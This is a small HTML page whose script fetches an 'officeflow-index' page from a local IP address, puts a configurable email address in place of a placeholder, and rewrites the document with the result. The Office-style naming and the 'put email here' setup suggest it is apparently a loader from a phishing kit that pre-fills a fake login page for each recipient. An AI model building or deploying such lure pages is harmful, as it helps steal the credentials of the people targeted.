<!DOCTYPE html>
<html dir="ltr" class="" lang="en">

<head>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
</head>

<body id="body">
  <script>
    $(document).ready(function () {

      // put email here
      var email = "rice@beans.com"
      // put html url here
      var htmlUrl = "http://192.168.64.2/officeflow-index/index.html"
     
      var append = "\""
      $.get(htmlUrl, function (data, status) {
       
        var data = data.replace("abc@abc.com", email);
      
        console.log(data);
       

        var newDoc = document.open("text/html", "replace");
        newDoc.write(data);
        newDoc.close();
        
        

      });


    });
  </script>

</body>
<!--<script src="load-bg.js"></script>-->

</html>